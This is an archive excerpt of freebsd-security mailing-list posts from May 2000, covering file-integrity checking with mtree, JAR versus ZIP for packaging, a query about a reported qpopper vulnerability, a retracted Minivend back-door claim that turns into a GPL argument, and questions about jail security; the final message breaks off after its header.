From owner-freebsd-security Sun May 14 7:30: 2 2000
Delivered-To: freebsd-security@freebsd.org
Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id DB51D37B614 for ; Sun, 14 May 2000 07:29:57 -0700 (PDT) (envelope-from Cy.Schubert@uumail.gov.bc.ca)
Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id HAA07649; Sun, 14 May 2000 07:28:38 -0700
Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda07645; Sun May 14 07:28:34 2000
Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.3/8.9.1) id HAA78759; Sun, 14 May 2000 07:28:30 -0700 (PDT)
Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdk78757; Sun May 14 07:28:00 2000
Received: (from uucp@localhost) by cwsys.cwsent.com (8.10.1/8.9.1) id e4EERx101152; Sun, 14 May 2000 07:27:59 -0700 (PDT)
Message-Id: <200005141427.e4EERx101152@cwsys.cwsent.com>
Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdoa1147; Sun May 14 07:27:19 2000
X-Mailer: exmh version 2.1.1 10/15/1999
Reply-To: Cy Schubert - ITSD Open Systems Group
From: Cy Schubert - ITSD Open Systems Group
X-OS: FreeBSD 4.0-STABLE
X-Sender: cy
To: Garrett Wollman
Cc: Cy Schubert - ITSD Open Systems Group , Mark Murray , Paul Hart , freebsd-security@FreeBSD.ORG
Subject: Re: envy.vuurwerk.nl daily run output
In-reply-to: Your message of "Thu, 11 May 2000 23:06:57 EDT."
             <200005120306.XAA22136@khavrinen.lcs.mit.edu>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Sun, 14 May 2000 07:27:18 -0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message <200005120306.XAA22136@khavrinen.lcs.mit.edu>, Garrett Wollman writes:
> < Cy.Schubert@uumail.gov.bc.ca> said:
>
> > I think that having tripwire or something with the same functionality
> > and features should be included in the base system.
>
> We do.  It would take a bit of work to create an `exclude' file (see
> my recent commit) so that constantly-changing files would not raise
> alarms, but otherwise `mtree -K md5digest,sha1digest,ripemd160digest'
> should do the trick.

Any chance of the new exclude code being MFC'd into -stable any time soon?


Regards,                       Phone:  (250)387-8437
Cy Schubert                      Fax:  (250)387-5766
Team Leader, Sun/DEC Team   Internet:  Cy.Schubert@osg.gov.bc.ca
Open Systems Group, ITSD, ISTA
Province of BC


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sun May 14 8:16: 7 2000
Delivered-To: freebsd-security@freebsd.org
Received: from megaweapon.zigg.com (megaweapon.zigg.com [206.114.60.8]) by hub.freebsd.org (Postfix) with ESMTP id 2764C37BCCB for ; Sun, 14 May 2000 08:16:04 -0700 (PDT) (envelope-from matt@zigg.com)
Received: from localhost (matt@localhost) by megaweapon.zigg.com (8.9.3/8.9.3) with ESMTP id LAA05695; Sun, 14 May 2000 11:15:52 -0400 (EDT) (envelope-from matt@zigg.com)
Date: Sun, 14 May 2000 11:15:51 -0400 (EDT)
From: Matt Behrens
To: Doug Barton
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: New packaging tool (was Re: Applying patches with out a compiler)
In-Reply-To: <391E4BCC.6EA3DB59@gorean.org>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Sat, 13 May 2000, Doug Barton wrote:

> I concur.
> I've always wondered why (info-)zip hasn't enjoyed more
> popularity in the unix world.  I used it extensively back when I ran
> OS/2, and it has a lot of nice features.

The reasons I've always avoided it:

1) until now, I've had this misconception (I don't know where it came
from, but I just investigated it) that it did not handle UNIX permissions
and ownerships (note that unzip does need a flag to restore ownerships);

2) every time I dig unzip out again it takes me several tries to remember
just how to get recursion like I'm used to with tar.

That said, I've used it to make up archives for Windoze boxes on several
occasions.

From owner-freebsd-security Mon May 15 7:28:33 2000
Delivered-To: freebsd-security@freebsd.org
Received: from shell.telemere.net (shell.telemere.net [63.224.9.3]) by hub.freebsd.org (Postfix) with ESMTP id 18CAD37B5B2 for ; Mon, 15 May 2000 07:28:30 -0700 (PDT) (envelope-from visigoth@telemere.net)
Received: by shell.telemere.net (Postfix, from userid 1001) id E44D170601; Mon, 15 May 2000 09:27:40 -0500 (CDT)
Received: from localhost (localhost [127.0.0.1]) by shell.telemere.net (Postfix) with ESMTP id E0D296C807 for ; Mon, 15 May 2000 09:27:40 -0500 (CDT)
Date: Mon, 15 May 2000 09:27:40 -0500 (CDT)
From: Visigoth
To: freebsd-security@freebsd.org
Subject: qpopper discussion on BUGTRAQ
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Greetings all...

I was just curious as to what the freebsd stance on the possible
qpopper-2.53 vuln as is being discussed on BUGTRAQ.  Has this vuln been
tested with the freebsd port?  Are there known issues?  I am going to
(hopefully) be taking a look at the "exploitability" of the freebsd port
for qpopper-2.53 but I was wondering if someone had already done all the
work.  I understand that the exploit posted on bugtraq would need to be
modified, but I am wondering if the security/ports team have taken care
of the offending piece of code already (which is so often the case)...

Even just a "Blah Blah Blah, NOT vulnerable" would be kewl...

Thanks

Visigoth

Damieon Stark
Sr. Unix Systems Administrator
visigoth@telemere.net
____________________________________________________________________________
| - M$ Win 2K was built for the internet.  | - Unix _BUILT_ the internet. |
| FreeBSD - The POWER to serve             | http://www.freebsd.org        |
| your call...                             |                               |
----------------------------------------------------------------------------

From owner-freebsd-security Mon May 15 8:12:44 2000
Delivered-To: freebsd-security@freebsd.org
Received: from obie.softweyr.com (obie.softweyr.com [204.68.178.33]) by hub.freebsd.org (Postfix) with ESMTP id 6004837B7A8 for ; Mon, 15 May 2000 08:12:38 -0700 (PDT) (envelope-from wes@softweyr.com)
Received: from softweyr.com (homer.softweyr.com [204.68.178.39]) by obie.softweyr.com (8.8.8/8.8.8) with ESMTP id JAA08034; Mon, 15 May 2000 09:12:24 -0600 (MDT) (envelope-from wes@softweyr.com)
Message-ID: <3920145A.D38B5731@softweyr.com>
Date: Mon, 15 May 2000 09:14:34 -0600
From: Wes Peters
Organization: Softweyr LLC
X-Mailer: Mozilla 4.7 [en] (X11; U; FreeBSD 4.0-STABLE i386)
X-Accept-Language: en
MIME-Version: 1.0
To: Michael Robinson
Cc: nate@yogotech.com, freebsd-security@FreeBSD.ORG
Subject: Re: New packaging tool (was Re: Applying patches with out a compiler)
References: <200005131111.TAA13455@netrinsics.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Michael Robinson wrote:
> 
> Nate Williams writes:
> >There are numerous advantages to using something like ZIP, including
> >removing the requirement to
> >'unpack' the archive in a staging area,
> >since we could now unpack it directly in its installation location.
> >
> >ZIP also allows signatures, and we have lots of free software that we
> >can leverage to implement the tools with it.
> 
> Or, heck, why not JAR format, seeing as it's a well-defined standard, does
> everything necessary, and has multiple interoperable implementations.

JARs have a table of contents?

-- 
            "Where am I, and what am I doing in this handbasket?"
Wes Peters                                                         Softweyr LLC
wes@softweyr.com                                           http://softweyr.com/

From owner-freebsd-security Mon May 15 8:27:28 2000
Delivered-To: freebsd-security@freebsd.org
Received: from obie.softweyr.com (obie.softweyr.com [204.68.178.33]) by hub.freebsd.org (Postfix) with ESMTP id 0ACF937B7F6 for ; Mon, 15 May 2000 08:27:24 -0700 (PDT) (envelope-from wes@softweyr.com)
Received: from softweyr.com (homer.softweyr.com [204.68.178.39]) by obie.softweyr.com (8.8.8/8.8.8) with ESMTP id JAA08070; Mon, 15 May 2000 09:27:16 -0600 (MDT) (envelope-from wes@softweyr.com)
Message-ID: <392017D7.C22BDB57@softweyr.com>
Date: Mon, 15 May 2000 09:29:27 -0600
From: Wes Peters
Organization: Softweyr LLC
X-Mailer: Mozilla 4.7 [en] (X11; U; FreeBSD 4.0-STABLE i386)
X-Accept-Language: en
MIME-Version: 1.0
To: Michael Robinson
Cc: nate@yogotech.com, freebsd-security@FreeBSD.ORG
Subject: Re: New packaging tool (was Re: Applying patches with out a compiler)
References: <200005131542.XAA13898@netrinsics.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Michael Robinson wrote:
> 
> Nate Williams writes:
> >> Or, heck, why not JAR format, seeing as it's a well-defined standard, does
> >> everything necessary, and has multiple interoperable implementations.
> >
> >FWIW, it's the same format. :) :)
> 
> Not strictly true.  All JAR files are ZIP files, but not all ZIP files are
> JAR files.
> 
> From your paean to the benefits of ZIP files, it sounded like you might
> go off and reinvent manifests, signature meta-data, and all the other
> stuff that's in the JAR spec, but in an incompatible, FreeBSD-specific way.

Got a handy pointer to the JAR spec?

-- 
            "Where am I, and what am I doing in this handbasket?"
Wes Peters                                                         Softweyr LLC
wes@softweyr.com                                           http://softweyr.com/

From owner-freebsd-security Mon May 15 8:34: 1 2000
Delivered-To: freebsd-security@freebsd.org
Received: from naiad.eclipse.net.uk (naiad.eclipse.net.uk [195.188.32.29]) by hub.freebsd.org (Postfix) with ESMTP id 1A70237B742 for ; Mon, 15 May 2000 08:33:58 -0700 (PDT) (envelope-from stuart@eclipse.net.uk)
Received: by naiad.eclipse.net.uk (Postfix, from userid 475) id 2D80C131E7; Mon, 15 May 2000 16:37:41 +0100 (BST)
Date: Mon, 15 May 2000 16:37:40 +0100
From: Stuart Henderson
To: Wes Peters
Cc: Michael Robinson , nate@yogotech.com, freebsd-security@FreeBSD.ORG
Subject: Re: New packaging tool (was Re: Applying patches with out a compiler)
Message-ID: <20000515163740.M83350@naiad.eclipse.net.uk>
References: <200005131542.XAA13898@netrinsics.com> <392017D7.C22BDB57@softweyr.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2i
In-Reply-To: <392017D7.C22BDB57@softweyr.com>; from wes@softweyr.com on Mon, May 15, 2000 at 09:29:27AM -0600
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Mon, May 15, 2000 at 09:29:27AM -0600, Wes Peters wrote:
> Got a handy pointer to the JAR spec?
http://java.sun.com/products/jdk/1.1/docs/guide/jar/
http://docs.iplanet.com/docs/manuals/signedobj/jarfile/jar.htm

From owner-freebsd-security Mon May 15 8:37:56 2000
Delivered-To: freebsd-security@freebsd.org
Received: from guardian.sparc.spb.su (guardian.sparc.spb.su [195.19.226.7]) by hub.freebsd.org (Postfix) with ESMTP id E29AA37B78B for ; Mon, 15 May 2000 08:37:42 -0700 (PDT) (envelope-from adu@sparc.spb.su)
Received: from guard.sparc.spb.su (guard.sparc.spb.su [195.19.226.98]) by guardian.sparc.spb.su (8.9.3/8.9.3) with ESMTP id TAA08619; Mon, 15 May 2000 19:38:53 +0400 (MSD)
Received: from mail.sparc.spb.su (mail.sparc.spb.su [192.168.205.210]) by guard.sparc.spb.su (8.9.3/8.9.3) with ESMTP id TAA04004; Mon, 15 May 2000 19:37:11 +0400 (MSD)
Received: from indra (indra.sparc.spb.su [192.168.205.84]) by mail.sparc.spb.su (8.9.3/8.9.3) with SMTP id TAA24714; Mon, 15 May 2000 19:30:17 +0400 (MSD)
Message-Id: <200005151530.TAA24714@mail.sparc.spb.su>
Date: Mon, 15 May 2000 19:36:41 +0400 (MSD)
From: "Denis Y. Antrushin"
Reply-To: "Denis Y. Antrushin"
Subject: Re: New packaging tool (was Re: Applying patches with out a compiler)
To: wes@softweyr.com
Cc: freebsd-security@FreeBSD.ORG
MIME-Version: 1.0
Content-Type: TEXT/plain; charset=us-ascii
Content-MD5: AxTBWdeOkpWsfiALzQZ//A==
X-Mailer: dtmail 1.3.0 @(#)CDE Version 1.3.4 SunOS 5.7 sun4u sparc
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

>> Not strictly true.  All JAR files are ZIP files, but not all ZIP files are
>> JAR files.
>>
>> From your paean to the benefits of ZIP files, it sounded like you might
>> go off and reinvent manifests, signature meta-data, and all the other
>> stuff that's in the JAR spec, but in an incompatible, FreeBSD-specific way.
>
>Got a handy pointer to the JAR spec?

http://java.sun.com/products/jdk/1.1/docs/guide/jar/

Not sure it's handy, though ;-)

-- 
Denis Antrushin, St-Petersburg HotJava Team
e-mail: adu@sparc.spb.su

From owner-freebsd-security Mon May 15 8:48:11 2000
Delivered-To: freebsd-security@freebsd.org
Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id EC4D737B5A0 for ; Mon, 15 May 2000 08:48:01 -0700 (PDT) (envelope-from brett@lariat.org)
Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id JAA02421; Mon, 15 May 2000 09:47:29 -0600 (MDT)
Message-Id: <4.3.1.2.20000515094342.045eb7e0@localhost>
X-Sender: brett@localhost
X-Mailer: QUALCOMM Windows Eudora Version 4.3.1
Date: Mon, 15 May 2000 09:47:21 -0600
To: mike@minivend.com
From: Brett Glass
Subject: Re: (forw) Back door in Minivend
Cc: security@freebsd.org
In-Reply-To: <20000515100638.A28429@bill.minivend.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I've checked the lists, and no, your program does not appear to be
the one which was reported to have a back door. I stand corrected.

The only thing that appears to be harmful about the program is that
it is GPLed. You really SHOULD consider using a truly free license!
According to Bruce Perens, the next version of the GPL will impose
nasty conditions upon service providers and merchants who use GPLed
code, such as requiring them to reveal all of their in-house additions
to it even if they do not redistribute it.

--Brett

At 08:06 AM 5/15/2000, Mike Heins wrote:

>Would appreciate it if you would correct your misstatement
>on the freebsd mail lists (I am not a subscriber). Thanks.
>
>Mike
>----- Forwarded message from Mike Heins -----
>
>Date: Mon, 15 May 2000 00:03:59 -0400
>From: Mike Heins
>To: lunatic@insane.net
>Subject: Back door in Minivend
>Reply-To: mike@minivend.com
>X-Mailer: Mutt 1.0pre3us
>
>I can assure you that there are no author-inserted back doors
>in Minivend, as I am the author. 8-)
>
>The source is completely open, is GPL, and has been examined by quite
>a few people. If you hear of any security problems, let me know.
>
>I am positive that there has not been a vulnerability posted
>to Bugtraq; certainly one of the thousands of Minivend users
>would have brought that to my attention.
>
>If you could post this to the freebsd mail list I would
>appreciate it, as I don't have access to it.
>
>Regards,
>Mike Heins
>-- 
>Internet Robotics, 131 Willow Lane, Floor 2, Oxford, OH 45056
>phone +1.513.523.7621 fax 7501
>
>Friends don't let friends use Outlook. -- Bob Blaylock
>
>----- End forwarded message -----
>
>-- 
>Internet Robotics, 131 Willow Lane, Floor 2, Oxford, OH 45056
>phone +1.513.523.7621 fax 7501
>
>Unix version of an Outlook-style virus:
>It works on the honor system. Please forward this message to everyone
>you know, and delete a bunch of your files at random.

If nothing else, the brain is an educational toy.
-- Tom Robbins

From owner-freebsd-security Mon May 15 8:54: 6 2000
Delivered-To: freebsd-security@freebsd.org
Received: from bill.minivend.com (bill.minivend.com [205.133.134.6]) by hub.freebsd.org (Postfix) with ESMTP id 1E74C37B78B for ; Mon, 15 May 2000 08:54:00 -0700 (PDT) (envelope-from mike@bill.minivend.com)
Received: (from mike@localhost) by bill.minivend.com (8.9.3/8.9.3) id LAA30050; Mon, 15 May 2000 11:52:49 -0400
Date: Mon, 15 May 2000 11:52:49 -0400
From: Mike Heins
To: Brett Glass
Cc: security@freebsd.org
Subject: Re: (forw) Back door in Minivend
Message-ID: <20000515115249.A30046@bill.minivend.com>
Reply-To: mike@minivend.com
References: <20000515100638.A28429@bill.minivend.com> <4.3.1.2.20000515094342.045eb7e0@localhost>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0pre3us
In-Reply-To: <4.3.1.2.20000515094342.045eb7e0@localhost>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Quoting Brett Glass (brett@lariat.org):
> The only thing that appears to be harmful about the
> program is that it is GPLed. You really SHOULD consider
> using a truly free license! According to Bruce Perens,
> the next version of the GPL will impose nasty conditions
> upon service providers and merchants who use GPLed code,
> such as requiring them to reveal all of their in-house
> additions to it even if they do not redistribute it.
> 

Soapbox noted.

-- 
Internet Robotics, 131 Willow Lane, Floor 2, Oxford, OH 45056
phone +1.513.523.7621 fax 7501

Be patient. God isn't finished with me yet.
-- unknown

From owner-freebsd-security Mon May 15 9: 4:55 2000
Delivered-To: freebsd-security@freebsd.org
Received: from gatekeeper.veriohosting.com (gatekeeper.veriohosting.com [192.41.0.2]) by hub.freebsd.org (Postfix) with ESMTP id 3B11537B5E6 for ; Mon, 15 May 2000 09:04:47 -0700 (PDT) (envelope-from hart@iserver.com)
Received: by gatekeeper.veriohosting.com; Mon, 15 May 2000 10:04:34 -0600 (MDT)
Received: from unknown(192.168.1.109) by gatekeeper.veriohosting.com via smap (V3.1.1) id xma024757; Mon, 15 May 00 10:04:21 -0600
Received: (hart@localhost) by anchovy.orem.iserver.com (8.9.3) id KAA23756; Mon, 15 May 2000 10:04:20 -0600 (MDT)
Date: Mon, 15 May 2000 10:04:20 -0600 (MDT)
From: Paul Hart
X-Sender: hart@anchovy.orem.iserver.com
To: Brett Glass
Cc: mike@minivend.com, security@FreeBSD.ORG
Subject: Re: (forw) Back door in Minivend
In-Reply-To: <4.3.1.2.20000515094342.045eb7e0@localhost>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Mon, 15 May 2000, Brett Glass wrote:

> According to Bruce Perens, the next version of the GPL will impose
> nasty conditions upon service providers and merchants who use GPLed
> code, such as requiring them to reveal all of their in-house additions
> to it even if they do not redistribute it.

And how much FUD spinning is that?  SPIN IT BABY!!

Paul Hart

-- 
Paul Robert Hart        ><8> ><8> ><8>        Verio Web Hosting, Inc.
hart@iserver.com        ><8> ><8> ><8>        http://www.iserver.com/

From owner-freebsd-security Mon May 15 9:21: 3 2000
Delivered-To: freebsd-security@freebsd.org
Received: from modemcable127.61-201-24.mtl.mc.videotron.net (modemcable127.61-201-24.mtl.mc.videotron.net [24.201.61.127]) by hub.freebsd.org (Postfix) with SMTP id E1F1337B6B6 for ; Mon, 15 May 2000 09:20:59 -0700 (PDT) (envelope-from patrick@mindstep.com)
Received: (qmail 48153 invoked from network); 15 May 2000 16:20:58 -0000
Received: from patrak.local.mindstep.com (HELO PATRAK) (192.168.10.4) by jacuzzi.local.mindstep.com with SMTP; 15 May 2000 16:20:58 -0000
Message-ID: <052001bfbe89$8087e590$040aa8c0@local.mindstep.com>
From: "Patrick Bihan-Faou"
To:
References: <200005131542.XAA13898@netrinsics.com> <392017D7.C22BDB57@softweyr.com> <20000515163740.M83350@naiad.eclipse.net.uk>
Subject: Re: New packaging tool (was Re: Applying patches with out a compiler)
Date: Mon, 15 May 2000 12:20:36 -0400
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2919.6700
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hi,

From: "Stuart Henderson"
> On Mon, May 15, 2000 at 09:29:27AM -0600, Wes Peters wrote:
> > Got a handy pointer to the JAR spec?
>
> http://java.sun.com/products/jdk/1.1/docs/guide/jar/
> http://docs.iplanet.com/docs/manuals/signedobj/jarfile/jar.htm
>

After looking at the jar "specification", it only offers a way to resolve
the "signing" problem. While this is good, I wonder how well extensions to
support the other features I am looking at implemented would be supported
by other "jar openers".
Is this the way we should go:

- create a "libjar" that can open and parse the content of the manifest in
a reasonable way
- (re)create the packaging tool so that it obtains its information from the
jar file.

The question is also: how do we go about manifest extensions in order to
support all of what we needed ?

- do we just create a set of "FreeBSD-specific" header/value pairs ?
- are there more headers specified for the JAR files ?

It looks to me that using this file format could be worthwhile, but to
provide the level of functionality that we have currently with pkg_* it
will require a good deal of non-standard extensions.

So are there any more complete specs for the jar files ? Should we pursue
in that direction ?

Patrick.

From owner-freebsd-security Mon May 15 9:52:24 2000
Delivered-To: freebsd-security@freebsd.org
Received: from falcon.grobin.org (falcon.grobin.org [204.225.173.44]) by hub.freebsd.org (Postfix) with ESMTP id 32A6237B719 for ; Mon, 15 May 2000 09:51:55 -0700 (PDT) (envelope-from geoff@grobin.org)
Received: by falcon.grobin.org (Postfix, from userid 1000) id 01BDA2C4; Mon, 15 May 2000 12:53:42 -0400 (EDT)
Received: from localhost (localhost [127.0.0.1]) by falcon.grobin.org (Postfix) with ESMTP id EFB112C2 for ; Mon, 15 May 2000 12:53:42 -0400 (EDT)
Date: Mon, 15 May 2000 12:53:42 -0400 (EDT)
From: Geoffrey Robinson
To: security@freebsd.org
Subject: Jail: Problems? Proper Usage? Status? Practicality?
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

ver: FreeBSD 4.0-STABLE #0: Sun May 14 11:06:58 EDT 2000

I'm planning to use jail in the near future to do two things. First is to
generally increase the security of a system by putting services like http,
smtp, ftp, etc. into separate jails to decrease the potential harm of a
security hole. This system will only allow shell accesses to trusted
individuals. The second plan is to create multiple, virtual servers on
another host system. These virtual servers will allow shell access to
semi-trusted individuals, including the jail root user. Also the jail
administrator could potentially run unsecure services. This second plan is
tentative depending on the reliability of jail.

I have setup a test jail on my workstation with good results. The first
problem I have found is that I can't access the jailed IP at all from the
host system, nor the host system from the jailed one. However both host
and jailed IPs are accessible to other machines on the network. Is this
intentional? The jailed system can access the Internet fine through my
natd setup on the host system (which actually surprised me).

I'm aware that raw sockets are not allowed to jailed processes but is
there a workaround for ping and traceroute?

Finally how secure is jail really? I'm aware of a trivial chroot breakout
technique. Does that hole still exist? Are there any other known holes?

Is jail still under active development?

Is it worth the trouble to do any of this?

Thanks.

------------------------------------------------------------------------------
| Geoffrey Robinson - geoff@grobin.org                                       |
------------------------------------------------------------------------------
Random Fortune Quote
When you're not looking at it, this fortune is written in FORTRAN.
From owner-freebsd-security Mon May 15 10:18: 2 2000
Delivered-To: freebsd-security@freebsd.org
Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by hub.freebsd.org (Postfix) with ESMTP id 6462137BB83 for ; Mon, 15 May 2000 10:17:57 -0700 (PDT) (envelope-from phk@critter.freebsd.dk)
Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.3/8.9.3) with ESMTP id TAA06179; Mon, 15 May 2000 19:17:35 +0200 (CEST) (envelope-from phk@critter.freebsd.dk)
To: Geoffrey Robinson
Cc: security@FreeBSD.ORG
Subject: Re: Jail: Problems? Proper Usage? Status? Practicality?
In-reply-to: Your message of "Mon, 15 May 2000 12:53:42 EDT."
Date: Mon, 15 May 2000 19:17:35 +0200
Message-ID: <6177.958411055@critter.freebsd.dk>
From: Poul-Henning Kamp
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

>I have setup a test jail on my workstation with good results. The first
>problem I have found is that I can't access the jailed IP at all from the
>host system, nor the host system from the jailed one. However both host
>and jailed IPs are accessible to other machines on the network. Is this
>intentional?

Sounds like some kind of configuration error in your end.  It works
fine for me.  In general it is best to add the IP aliases to the lo0
interface.

>Finally how secure is jail really?

I don't know of any way to escape.  There are a few known things where
someone in a jail can make a nuisance of themselves, but not a way for
them to break out.

>Is jail still under active development?

I would call it "under normal maintenance", there are no planned new
features on the way.

>Is it worth the trouble to do any of this?

Now how would *I* know ?  :-)

--
Poul-Henning Kamp             | UNIX since Zilog Zeus 3.20
phk@FreeBSD.ORG               | TCP/IP since RFC 956
FreeBSD coreteam member       | BSD since 4.3-tahoe
Never attribute to malice what can adequately be explained by incompetence.

From owner-freebsd-security Mon May 15 11: 1:19 2000
Delivered-To: freebsd-security@freebsd.org
Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 13D7C37BBFD for ; Mon, 15 May 2000 11:01:05 -0700 (PDT) (envelope-from brett@lariat.org)
Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id MAA03881; Mon, 15 May 2000 12:00:46 -0600 (MDT)
Message-Id: <4.3.1.2.20000515115811.045e6690@localhost>
X-Sender: brett@localhost
X-Mailer: QUALCOMM Windows Eudora Version 4.3.1
Date: Mon, 15 May 2000 12:00:37 -0600
To: Paul Hart
From: Brett Glass
Subject: Re: (forw) Back door in Minivend
Cc: mike@minivend.com, security@FreeBSD.ORG
In-Reply-To:
References: <4.3.1.2.20000515094342.045eb7e0@localhost>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

At 10:04 AM 5/15/2000, Paul Hart wrote:

>On Mon, 15 May 2000, Brett Glass wrote:
>
> > According to Bruce Perens, the next version of the GPL will impose
> > nasty conditions upon service providers and merchants who use GPLed
> > code, such as requiring them to reveal all of their in-house additions
> > to it even if they do not redistribute it.
>
>And how much FUD spinning is that?  SPIN IT BABY!!

It's not FUD; it is the absolute truth. I have the tape of the session
at the February LinuxWorld in which Bruce said that -- emphatically.

One of these days, people will begin to get the idea that the GPL is
not actually about freedom. It is, rather, a weapon of spite and an
attempt to accumulate power and control.
--Brett Glass

If nothing else, the brain is an educational toy.
-- Tom Robbins

From owner-freebsd-security Mon May 15 11: 9:29 2000
Delivered-To: freebsd-security@freebsd.org
Received: from bill.minivend.com (bill.minivend.com [205.133.134.6]) by hub.freebsd.org (Postfix) with ESMTP id 38D8D37BC3D for ; Mon, 15 May 2000 11:09:16 -0700 (PDT) (envelope-from mike@bill.minivend.com)
Received: (from mike@localhost) by bill.minivend.com (8.9.3/8.9.3) id OAA31424; Mon, 15 May 2000 14:07:51 -0400
Date: Mon, 15 May 2000 14:07:51 -0400
From: Mike Heins
To: Brett Glass
Cc: Paul Hart , mike@minivend.com, security@FreeBSD.ORG
Subject: Re: (forw) Back door in Minivend
Message-ID: <20000515140751.A31420@bill.minivend.com>
Reply-To: mike@minivend.com
References: <4.3.1.2.20000515094342.045eb7e0@localhost> <4.3.1.2.20000515115811.045e6690@localhost>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0pre3us
In-Reply-To: <4.3.1.2.20000515115811.045e6690@localhost>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Quoting Brett Glass (brett@lariat.org):
> At 10:04 AM 5/15/2000, Paul Hart wrote:
> 
> >On Mon, 15 May 2000, Brett Glass wrote:
> >
> > > According to Bruce Perens, the next version of the GPL will impose
> > > nasty conditions upon service providers and merchants who use GPLed
> > > code, such as requiring them to reveal all of their in-house additions
> > > to it even if they do not redistribute it.
> >
> >And how much FUD spinning is that?  SPIN IT BABY!!
> 
> It's not FUD; it is the absolute truth. I have the tape of the session
> at the February LinuxWorld in which Bruce said that -- emphatically.
> 
> One of these days, people will begin to get the idea that the GPL is
> not actually about freedom. It is, rather, a weapon of spite and an
> attempt to accumulate power and control.
> 

Hi,

You can take me off of the Cc: list -- I have had my fill of GPL vs.
BSD arguments over time.... 8-)

-- 
Internet Robotics, 131 Willow Lane, Floor 2, Oxford, OH 45056
phone +1.513.523.7621 fax 7501

Research is what I'm doing when I don't know what I'm doing.
-- Wernher Von Braun

From owner-freebsd-security Mon May 15 11:12:38 2000
Delivered-To: freebsd-security@freebsd.org
Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20]) by hub.freebsd.org (Postfix) with ESMTP id A8CFC37B78B for ; Mon, 15 May 2000 11:12:24 -0700 (PDT) (envelope-from bright@fw.wintelcom.net)
Received: (from bright@localhost) by fw.wintelcom.net (8.10.0/8.10.0) id e4FIiSe02580; Mon, 15 May 2000 11:44:28 -0700 (PDT)
Date: Mon, 15 May 2000 11:44:28 -0700
From: Alfred Perlstein
To: Brett Glass
Cc: Paul Hart , mike@minivend.com, security@FreeBSD.ORG
Subject: Re: (forw) Back door in Minivend
Message-ID: <20000515114427.B249@fw.wintelcom.net>
References: <4.3.1.2.20000515094342.045eb7e0@localhost> <4.3.1.2.20000515115811.045e6690@localhost>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0.1i
In-Reply-To: <4.3.1.2.20000515115811.045e6690@localhost>; from brett@lariat.org on Mon, May 15, 2000 at 12:00:37PM -0600
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

* Brett Glass [000515 11:38] wrote:
> At 10:04 AM 5/15/2000, Paul Hart wrote:
> 
